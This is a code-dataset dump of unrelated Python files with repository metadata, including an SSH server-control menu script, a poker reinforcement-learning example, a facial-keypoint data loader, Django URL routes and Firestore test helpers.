ok = input("If you have already done the setup, press enter and execute the program again. If you haven't, edit the file with the help of the manual.")
f = open("data/1ststart", "w")
iststart = f.write("1")
f.close
sys.exit()
#open json file with the server data
js = open("data/info.txt", "r")
jsondata = f.read()
file_path = "data/info.txt"
with open(file_path, 'r') as j:
jdfp = json.loads(j.read())
#jdfp = json.loads(jsondata)
f.close
os.system('cls' if os.name == 'nt' else 'clear')
#Initial menu
print("Options avalible for the server: ")
print("1) Check server temperature (NOT WORKING)")
print("2) Reboot the server")
print("3) Shut down the server (in 1 minute)")
print("4) Shut down the server (instantaniously)")
print("5) Custom command (check README)")
option = input("Type a number an then press enter: ")
#Enter the server
host = (jdfp["ip"])
port = (jdfp["port"])
username = (jdfp["user"])
password = getpass("Password for user " + username + ": ")
# Check the number selected:
if option == "1":
command = "echo wip"
elif option == "2":
command = "sudo reboot"
elif option == "3":
command = "sudo shutdown +1"
elif option == "4":
command = "sudo shutdown now"
elif option == "5":
command = (jdfp["custom_command"])
else:
print("ERROR: No command selected. Program will close.")
sys.exit()
#make contact with server and do operation
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, username, password)
stdin, stdout, stderr = ssh.exec_command(command)
lines = stdout.readlines()
print(lines)
| 26.5 | 155 | 0.687989 | # Original by EMC-prog
# UNDER THE MIT LICENSE
import paramiko
import time
import os
import json
import sys
from getpass import getpass
print("ServerChecker")
print("Check and command your linux server without knowing Linux")
time.sleep(2)
os.system('cls' if os.name == 'nt' else 'clear')
#Know if the program has been opened already:
f = open("data/1ststart", "r")
iststart = f.read()
f.close
if iststart == "0":
print("Looks like you haven't started this program before. You have to fill the file located in 'data/info.txt'.")
ok = input("If you have already done the setup, press enter and execute the program again. If you haven't, edit the file with the help of the manual.")
f = open("data/1ststart", "w")
iststart = f.write("1")
f.close
sys.exit()
#open json file with the server data
js = open("data/info.txt", "r")
jsondata = f.read()
file_path = "data/info.txt"
with open(file_path, 'r') as j:
jdfp = json.loads(j.read())
#jdfp = json.loads(jsondata)
f.close
os.system('cls' if os.name == 'nt' else 'clear')
#Initial menu
print("Options avalible for the server: ")
print("1) Check server temperature (NOT WORKING)")
print("2) Reboot the server")
print("3) Shut down the server (in 1 minute)")
print("4) Shut down the server (instantaniously)")
print("5) Custom command (check README)")
option = input("Type a number an then press enter: ")
#Enter the server
host = (jdfp["ip"])
port = (jdfp["port"])
username = (jdfp["user"])
password = getpass("Password for user " + username + ": ")
# Check the number selected:
if option == "1":
command = "echo wip"
elif option == "2":
command = "sudo reboot"
elif option == "3":
command = "sudo shutdown +1"
elif option == "4":
command = "sudo shutdown now"
elif option == "5":
command = (jdfp["custom_command"])
else:
print("ERROR: No command selected. Program will close.")
sys.exit()
#make contact with server and do operation
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, username, password)
stdin, stdout, stderr = ssh.exec_command(command)
lines = stdout.readlines()
print(lines)
| 0 | 0 | 0 |
7999c1dc2f3ca8e7e583e7fb697df31e59fc908a | 929 | py | Python | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | 2 | 2020-01-02T19:54:46.000Z | 2020-03-09T08:49:33.000Z | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | null | null | null | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | 1 | 2020-03-28T22:53:16.000Z | 2020-03-28T22:53:16.000Z | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sdi_pandas",
version="0.0.38",
author="Thorsten Hapke",
author_email="thorsten.hapke@sap.com",
description="List of operators using the pandas module for processing the input",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thhapke/sdi_pandas/",
keywords = ['SAP Data Intelligence','pandas','operator'],
packages=setuptools.find_packages(),
install_requires=[
'pandas',
'numpy',
'fuzzywuzzy'
],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | 30.966667 | 85 | 0.650161 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sdi_pandas",
version="0.0.38",
author="Thorsten Hapke",
author_email="thorsten.hapke@sap.com",
description="List of operators using the pandas module for processing the input",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thhapke/sdi_pandas/",
keywords = ['SAP Data Intelligence','pandas','operator'],
packages=setuptools.find_packages(),
install_requires=[
'pandas',
'numpy',
'fuzzywuzzy'
],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | 0 | 0 | 0 |
4aaa7331a48d35a7a77be12908d0f10a4108f6d1 | 3,447 | py | Python | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | 2 | 2020-08-24T21:30:44.000Z | 2020-10-27T03:44:04.000Z | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | null | null | null | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | 2 | 2020-02-23T17:26:14.000Z | 2020-12-22T15:34:13.000Z | ''' An example of learning a NFSP Agent on Limit Texas Holdem
'''
import torch
import rlcard
from rlcard.agents.nfsp_agent_pytorch import NFSPAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('limit-holdem')
eval_env = rlcard.make('limit-holdem')
# Set the iterations numbers and how frequently we evaluate/save plot
evaluate_every = 100
save_plot_every = 1000
evaluate_num = 10000
episode_num = 10000000
# Set the the number of steps for collecting normalization statistics
# and intial memory size
memory_init_size = 1000
norm_step = 1000
# The paths for saving the logs and learning curves
root_path = './experiments/limit_holdem_nfsp_pytorch_result/'
log_path = root_path + 'log.txt'
csv_path = root_path + 'performance.csv'
figure_path = root_path + 'figures/'
# Set a global seed
set_global_seed(0)
# Set agents
agents = []
for i in range(env.player_num):
agent = NFSPAgent(scope='nfsp' + str(i),
action_num=env.action_num,
state_shape=env.state_shape,
hidden_layers_sizes=[512,512],
anticipatory_param=0.1,
min_buffer_size_to_learn=memory_init_size,
q_replay_memory_init_size=memory_init_size,
q_norm_step=norm_step,
q_mlp_layers=[512,512])
agents.append(agent)
random_agent = RandomAgent(action_num=eval_env.action_num)
env.set_agents(agents)
eval_env.set_agents([agents[0], random_agent])
# Count the number of steps
step_counters = [0 for _ in range(env.player_num)]
# Init a Logger to plot the learning curve
logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)
for episode in range(episode_num):
# First sample a policy for the episode
for agent in agents:
agent.sample_episode_policy()
# Generate data from the environment
trajectories, _ = env.run(is_training=True)
# Feed transitions into agent memory, and train the agent
for i in range(env.player_num):
for ts in trajectories[i]:
agents[i].feed(ts)
step_counters[i] += 1
# Train the agent
train_count = step_counters[i] - (memory_init_size + norm_step)
if train_count > 0 and train_count % 64 == 0:
rl_loss = agents[i].train_rl()
sl_loss = agents[i].train_sl()
print('\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')
# Evaluate the performance. Play with random agents.
if episode % evaluate_every == 0:
reward = 0
for eval_episode in range(evaluate_num):
_, payoffs = eval_env.run(is_training=False)
reward += payoffs[0]
logger.log('\n########## Evaluation ##########')
logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))
# Add point to logger
logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)
# Make plot
if episode % save_plot_every == 0 and episode > 0:
logger.make_plot(save_path=figure_path+str(episode)+'.png')
# Make the final plot
logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')
| 34.128713 | 131 | 0.669568 | ''' An example of learning a NFSP Agent on Limit Texas Holdem
'''
import torch
import rlcard
from rlcard.agents.nfsp_agent_pytorch import NFSPAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('limit-holdem')
eval_env = rlcard.make('limit-holdem')
# Set the iterations numbers and how frequently we evaluate/save plot
evaluate_every = 100
save_plot_every = 1000
evaluate_num = 10000
episode_num = 10000000
# Set the the number of steps for collecting normalization statistics
# and intial memory size
memory_init_size = 1000
norm_step = 1000
# The paths for saving the logs and learning curves
root_path = './experiments/limit_holdem_nfsp_pytorch_result/'
log_path = root_path + 'log.txt'
csv_path = root_path + 'performance.csv'
figure_path = root_path + 'figures/'
# Set a global seed
set_global_seed(0)
# Set agents
agents = []
for i in range(env.player_num):
agent = NFSPAgent(scope='nfsp' + str(i),
action_num=env.action_num,
state_shape=env.state_shape,
hidden_layers_sizes=[512,512],
anticipatory_param=0.1,
min_buffer_size_to_learn=memory_init_size,
q_replay_memory_init_size=memory_init_size,
q_norm_step=norm_step,
q_mlp_layers=[512,512])
agents.append(agent)
random_agent = RandomAgent(action_num=eval_env.action_num)
env.set_agents(agents)
eval_env.set_agents([agents[0], random_agent])
# Count the number of steps
step_counters = [0 for _ in range(env.player_num)]
# Init a Logger to plot the learning curve
logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)
for episode in range(episode_num):
# First sample a policy for the episode
for agent in agents:
agent.sample_episode_policy()
# Generate data from the environment
trajectories, _ = env.run(is_training=True)
# Feed transitions into agent memory, and train the agent
for i in range(env.player_num):
for ts in trajectories[i]:
agents[i].feed(ts)
step_counters[i] += 1
# Train the agent
train_count = step_counters[i] - (memory_init_size + norm_step)
if train_count > 0 and train_count % 64 == 0:
rl_loss = agents[i].train_rl()
sl_loss = agents[i].train_sl()
print('\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')
# Evaluate the performance. Play with random agents.
if episode % evaluate_every == 0:
reward = 0
for eval_episode in range(evaluate_num):
_, payoffs = eval_env.run(is_training=False)
reward += payoffs[0]
logger.log('\n########## Evaluation ##########')
logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))
# Add point to logger
logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)
# Make plot
if episode % save_plot_every == 0 and episode > 0:
logger.make_plot(save_path=figure_path+str(episode)+'.png')
# Make the final plot
logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')
| 0 | 0 | 0 |
7d06b8a1e935f41c825242385e77b3ec1e1c036d | 5,899 | py | Python | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | import os
import random
import cv2
import matplotlib.image as mpimg
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
class FacialKeypointsDataset(Dataset):
"""
Face Landmarks dataset.
"""
def __init__(self, csv_file, root_dir, transform=None):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.key_pts_frame = pd.read_csv(csv_file)
self.root_dir = root_dir
self.transform = transform
# Tranforms
class Normalize(object):
"""
Convert a color image to grayscale and normalize the color range to [0,1].
"""
class Rescale(object):
"""
Rescale the image in a sample to a given size.
Args:
output_size (tuple or int): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
class RandomCrop(object):
"""
Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
class ToTensor(object):
"""
Convert ndarrays in sample to Tensors.
"""
| 28.360577 | 92 | 0.583658 | import os
import random
import cv2
import matplotlib.image as mpimg
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
class FacialKeypointsDataset(Dataset):
"""
Face Landmarks dataset.
"""
def __init__(self, csv_file, root_dir, transform=None):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.key_pts_frame = pd.read_csv(csv_file)
self.root_dir = root_dir
self.transform = transform
def __len__(self):
return len(self.key_pts_frame)
def __getitem__(self, index):
image_name = os.path.join(self.root_dir,
self.key_pts_frame.iloc[index, 0])
image = mpimg.imread(image_name)
# if image has an alpha color channel, get rid of it
if image.shape[2] == 4:
image = image[:, :, 0:3]
key_pts = self.key_pts_frame.iloc[index, 1:].values
key_pts = key_pts.astype('float').reshape(-1, 2)
sample = {'image': image, 'keypoints': key_pts}
if self.transform:
sample = self.transform(sample)
return sample
# Tranforms
class Normalize(object):
"""
Convert a color image to grayscale and normalize the color range to [0,1].
"""
def __call__(self, sample):
image = sample['image']
key_pts = sample['keypoints']
key_pts_copy = np.copy(key_pts)
# convert image to grayscale
image_copy = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# scale color range from [0, 255] to [0, 1]
image_copy = image_copy / 255.0
# scale keypoints to be centered around 0 with a range of [-1, 1]
# mean = 100, sqrt = 50, so, pts should be (pts - 100)/50
key_pts_copy = (key_pts_copy - 100) / 50.0
return {'image': image_copy,
'keypoints': key_pts_copy}
class Rescale(object):
"""
Rescale the image in a sample to a given size.
Args:
output_size (tuple or int): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image = sample['image']
key_pts = sample['keypoints']
height, width = image.shape[:2]
if isinstance(self.output_size, int):
if height > width:
new_height = self.output_size * height / width
new_width = self.output_size
else:
new_height = self.output_size
new_width = self.output_size * width / height
else:
new_height, new_width = self.output_size
new_height, new_width = int(new_height), int(new_width)
rescaled_image = cv2.resize(image, (new_width, new_height))
# scale the pts, too
key_pts = key_pts * [new_width / width, new_height / height]
return {'image': rescaled_image,
'keypoints': key_pts}
class RandomHorizontalFlip(object):
def __init__(self):
self.flip_probability = 0.5
def __call__(self, sample):
image = sample['image']
key_pts = sample['keypoints']
do_flip = random.random() > self.flip_probability
if do_flip:
width = image.shape[1]
center = width / 2
flipped_image = cv2.flip(image, 1)
def flip_keypoint_horizontally(p):
if p[0] < center:
p[0] += 2 * abs(center - p[0])
else:
p[0] -= 2 * abs(center - p[0])
return p
flipped_keypoints = np.array([flip_keypoint_horizontally(kp) for kp in key_pts])
return {'image': flipped_image,
'keypoints': flipped_keypoints}
else:
return sample
class RandomCrop(object):
"""
Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image = sample['image']
key_pts = sample['keypoints']
height, width = image.shape[:2]
new_height, new_width = self.output_size
top = np.random.randint(0, height - new_height)
left = np.random.randint(0, width - new_width)
image = image[top: top + new_height, left: left + new_width]
key_pts = key_pts - [left, top] # Broadcasting
return {'image': image,
'keypoints': key_pts}
class ToTensor(object):
"""
Convert ndarrays in sample to Tensors.
"""
def __call__(self, sample):
image = sample['image']
key_pts = sample['keypoints']
# if image has no grayscale color channel, add one
if len(image.shape) == 2:
# add that third color dim
image = image.reshape(image.shape[0], image.shape[1], 1)
# swap color axis because
# numpy image: Height x Width x Channels
# torch image: Channels X Height X Width
image = image.transpose((2, 0, 1))
return {'image': torch.from_numpy(image),
'keypoints': torch.from_numpy(key_pts)}
| 4,163 | 14 | 292 |
890e4c7f12b5b3b533294613e48301232b0d8c3c | 841 | py | Python | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | import requests
| 27.129032 | 71 | 0.588585 | import requests
class AuthServerClient:
@property
def server_url(self):
#return "http://localhost:8000/"
return "https://urbamatica.appspot.com/"
def get_authorize_url(self, provider):
return self.call("get_authorize_url", "get", provider=provider)
def get_token(self, state):
return self.call("get_token", "post", state=state)
def call(self, name, method, **params):
server_url = self.server_url.rstrip("/")
response = requests.request(
method,
f"{server_url}/{name}",
params=params if method.lower() == "get" else None,
data=params if method.lower() != "get" else None
)
try:
result = response.json()
except ValueError:
result = response.content
return result
| 677 | 124 | 23 |
dffb9c0e062cdd510faab296053db97cdaa1a672 | 516 | py | Python | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 514 | 2017-07-10T22:29:36.000Z | 2022-03-24T12:06:08.000Z | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 18 | 2017-08-13T01:57:32.000Z | 2020-08-03T19:56:10.000Z | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 116 | 2017-08-05T09:10:42.000Z | 2021-11-12T10:42:10.000Z | TWOHERTZ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
FIVEHERTZ = [
36,
40,
44,
48,
52,
56,
60,
64,
100,
104,
108,
112,
116,
132,
136,
140,
149,
153,
157,
161,
165,
]
ALL = [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
36,
40,
44,
48,
52,
56,
60,
64,
100,
104,
108,
112,
116,
132,
136,
140,
149,
153,
157,
161,
165,
]
| 8.459016 | 46 | 0.302326 | TWOHERTZ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
FIVEHERTZ = [
36,
40,
44,
48,
52,
56,
60,
64,
100,
104,
108,
112,
116,
132,
136,
140,
149,
153,
157,
161,
165,
]
ALL = [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
36,
40,
44,
48,
52,
56,
60,
64,
100,
104,
108,
112,
116,
132,
136,
140,
149,
153,
157,
161,
165,
]
| 0 | 0 | 0 |
e0cadd9390762e552fb2dde0b50ff58b7778b895 | 403 | py | Python | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | 1 | 2021-02-19T11:00:11.000Z | 2021-02-19T11:00:11.000Z | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | null | null | null | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.8
print(uni_char1('abcdaefg')) | 15.5 | 39 | 0.682382 | #!/usr/bin/env python3.8
def uni_char(string):
return len(string) == len(set(string))
def uni_char1(string):
letters = set()
for char in string:
if char in letters:
return False
else:
letters.add(char)
return True
def uni_char2(string):
letters = {}
for char in string:
if char in letters:
return False
else:
letters[char] = True
return True
print(uni_char1('abcdaefg')) | 280 | 0 | 69 |
49eae1dda744367d8fab8df4d149cd4f4d3e0711 | 1,639 | py | Python | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | from django.urls import path
from .views import RecipientDetails, MeetSchedule, DashboardView, MyMapView, SubmitMap, submitForReview,AdminGraphView, FinalSubmit, Approval, SentForApprovalMap, SaveApprovedVersion, GetLatestRevision, CommentSubmit, Discard, ReviewerReview, embedded_signing_ceremony, get_access_code, auth_login, sign_complete
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
path('', DashboardView, name='dashboard-home'),
path('MyMapView/', MyMapView, name='my-map-view'),
path('submitMap/', SubmitMap),
path('submitForReview/', submitForReview, name='submit-review'),
path('AdminMapView/', AdminGraphView, name='admin-graph-view'),
path('FinalSubmit/', FinalSubmit),
path('approve/', Approval, name='user-approve'),
path('ApprovedMap/', SentForApprovalMap, name='approved-map'),
path('SaveRevision/', SaveApprovedVersion, name='approved-revision'),
path('GetLatestRevision/', GetLatestRevision, name='latest-revision'),
path('CommentSubmit/', CommentSubmit, name='comment-submit'),
path('Discard/', Discard, name='discard'),
path('reviewerReview/', ReviewerReview, name='reviewer-review'),
path('meetSchedule/', MeetSchedule, name='meet-schedule'),
path('recipients/', RecipientDetails, name='recipients'),
url(r'^get_signing_url/$', embedded_signing_ceremony, name='get_signing_url'),
url(r'^get_access_code/$', get_access_code, name='get_access_code'),
url(r'^auth_login/$', auth_login, name='auth_login'),
url(r'^sign_completed/$', sign_complete, name='sign_completed'),
]
| 60.703704 | 312 | 0.744966 | from django.urls import path
from .views import RecipientDetails, MeetSchedule, DashboardView, MyMapView, SubmitMap, submitForReview,AdminGraphView, FinalSubmit, Approval, SentForApprovalMap, SaveApprovedVersion, GetLatestRevision, CommentSubmit, Discard, ReviewerReview, embedded_signing_ceremony, get_access_code, auth_login, sign_complete
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
path('', DashboardView, name='dashboard-home'),
path('MyMapView/', MyMapView, name='my-map-view'),
path('submitMap/', SubmitMap),
path('submitForReview/', submitForReview, name='submit-review'),
path('AdminMapView/', AdminGraphView, name='admin-graph-view'),
path('FinalSubmit/', FinalSubmit),
path('approve/', Approval, name='user-approve'),
path('ApprovedMap/', SentForApprovalMap, name='approved-map'),
path('SaveRevision/', SaveApprovedVersion, name='approved-revision'),
path('GetLatestRevision/', GetLatestRevision, name='latest-revision'),
path('CommentSubmit/', CommentSubmit, name='comment-submit'),
path('Discard/', Discard, name='discard'),
path('reviewerReview/', ReviewerReview, name='reviewer-review'),
path('meetSchedule/', MeetSchedule, name='meet-schedule'),
path('recipients/', RecipientDetails, name='recipients'),
url(r'^get_signing_url/$', embedded_signing_ceremony, name='get_signing_url'),
url(r'^get_access_code/$', get_access_code, name='get_access_code'),
url(r'^auth_login/$', auth_login, name='auth_login'),
url(r'^sign_completed/$', sign_complete, name='sign_completed'),
]
| 0 | 0 | 0 |
95fac783ccf720a62910955d05435041390a95ce | 740 | py | Python | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import os
import tempfile
from flexmock import flexmock
from orator.commands.command import Command
from . import OratorCommandTestCase
class FooCommand(Command):
"""
Test Command
"""
name = "foo"
| 20.555556 | 72 | 0.643243 | # -*- coding:utf-8 -*-
import os
import tempfile
from flexmock import flexmock
from orator.commands.command import Command
from . import OratorCommandTestCase
class FooCommand(Command):
"""
Test Command
"""
name = "foo"
def handle(self):
pass
class CommandTestCase(OratorCommandTestCase):
def test_get_py_config_and_require___file__(self):
filename = tempfile.mktemp(".py")
with open(filename, "w") as f:
f.write("foo = __file__")
command = flexmock(FooCommand())
command.should_call("_get_config").and_return({"foo": filename})
self.run_command(command, [("-c", filename)])
if os.path.exists(filename):
os.remove(filename)
| 397 | 24 | 76 |
92d20b7eced1c72eae2c0685c60678fcf8b161bb | 3,369 | py | Python | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 140 | 2020-02-16T19:35:47.000Z | 2022-03-27T23:58:03.000Z | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 311 | 2020-01-31T23:45:43.000Z | 2022-03-22T14:41:34.000Z | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 52 | 2020-01-31T21:40:11.000Z | 2022-02-25T18:32:51.000Z | # Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import concurrent.futures
import datetime
import mock
import typing
import google
from google.cloud.firestore_v1.base_client import BaseClient
from google.cloud.firestore_v1.document import DocumentReference, DocumentSnapshot
from google.cloud._helpers import _datetime_to_pb_timestamp, UTC # type: ignore
from google.cloud.firestore_v1._helpers import build_timestamp
from google.cloud.firestore_v1.async_client import AsyncClient
from google.cloud.firestore_v1.client import Client
from google.protobuf.timestamp_pb2 import Timestamp # type: ignore
| 31.783019 | 87 | 0.700208 | # Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import concurrent.futures
import datetime
import mock
import typing
import google
from google.cloud.firestore_v1.base_client import BaseClient
from google.cloud.firestore_v1.document import DocumentReference, DocumentSnapshot
from google.cloud._helpers import _datetime_to_pb_timestamp, UTC # type: ignore
from google.cloud.firestore_v1._helpers import build_timestamp
from google.cloud.firestore_v1.async_client import AsyncClient
from google.cloud.firestore_v1.client import Client
from google.protobuf.timestamp_pb2 import Timestamp # type: ignore
def make_test_credentials() -> google.auth.credentials.Credentials: # type: ignore
import google.auth.credentials # type: ignore
return mock.Mock(spec=google.auth.credentials.Credentials)
def make_client(project_name: typing.Optional[str] = None) -> Client:
return Client(
project=project_name or "project-project", credentials=make_test_credentials(),
)
def make_async_client() -> AsyncClient:
return AsyncClient(project="project-project", credentials=make_test_credentials())
def build_test_timestamp(
year: int = 2021,
month: int = 1,
day: int = 1,
hour: int = 12,
minute: int = 0,
second: int = 0,
) -> Timestamp:
return _datetime_to_pb_timestamp(
datetime.datetime(
year=year,
month=month,
day=day,
hour=hour,
minute=minute,
second=second,
tzinfo=UTC,
),
)
def build_document_snapshot(
*,
collection_name: str = "col",
document_id: str = "doc",
client: typing.Optional[BaseClient] = None,
data: typing.Optional[typing.Dict] = None,
exists: bool = True,
create_time: typing.Optional[Timestamp] = None,
read_time: typing.Optional[Timestamp] = None,
update_time: typing.Optional[Timestamp] = None,
) -> DocumentSnapshot:
return DocumentSnapshot(
DocumentReference(collection_name, document_id, client=client),
data or {"hello", "world"},
exists=exists,
read_time=read_time or build_timestamp(),
create_time=create_time or build_timestamp(),
update_time=update_time or build_timestamp(),
)
class FakeThreadPoolExecutor:
def __init__(self, *args, **kwargs):
self._shutdown = False
def submit(self, callable) -> typing.NoReturn:
if self._shutdown:
raise RuntimeError(
"cannot schedule new futures after shutdown"
) # pragma: NO COVER
future = concurrent.futures.Future()
future.set_result(callable())
return future
def shutdown(self):
self._shutdown = True
def __repr__(self):
return f"FakeThreadPoolExecutor(shutdown={self._shutdown})"
| 1,960 | 8 | 245 |
0796a1a08ccd54c91e9b96ca9f9dfe700c1debed | 2,412 | py | Python | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | diwei-tan/PeekingDuck | 0169365580160f02be86fc8979a9915b8cefffcd | [
"Apache-2.0"
] | 1 | 2021-08-19T09:39:14.000Z | 2021-08-19T09:39:14.000Z | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | sidney-tio/PeekingDuck | 966734ab81c9e466ab51495644673c2d52daf17c | [
"Apache-2.0"
] | null | null | null | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | sidney-tio/PeekingDuck | 966734ab81c9e466ab51495644673c2d52daf17c | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
